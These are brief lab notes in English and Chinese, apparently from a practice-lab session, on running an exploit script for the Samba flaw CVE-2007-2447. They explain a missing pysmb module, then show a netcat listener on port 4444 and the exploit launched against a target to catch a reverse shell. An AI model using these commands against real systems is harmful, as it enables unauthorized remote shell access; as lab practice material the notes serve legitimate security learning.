🖥️ -h3x0v3rl0rd- #️⃣ CVE-2007-2447
python3 smb3.0.20.py -lh [localhost] -lp [local port] -t [target]

你遇到的错误表明 Python 脚本试图导入一个名为 smb 的模块,但你的系统上没有安装该模块。smb 模块属于 pysmb 库,用于与 SMB/CIFS 服务器交互。
要解决这个问题,你需要安装 pysmb 库。可以使用 pip 来完成,具体步骤如下:
pip3 install pysmb
python3 -c "import smb; print('pysmb is installed')"

nc -nlvp 4444
python3 smb3.0.20.py -lh 10.10.16.18 -lp 4444 -t 10.10.10.3

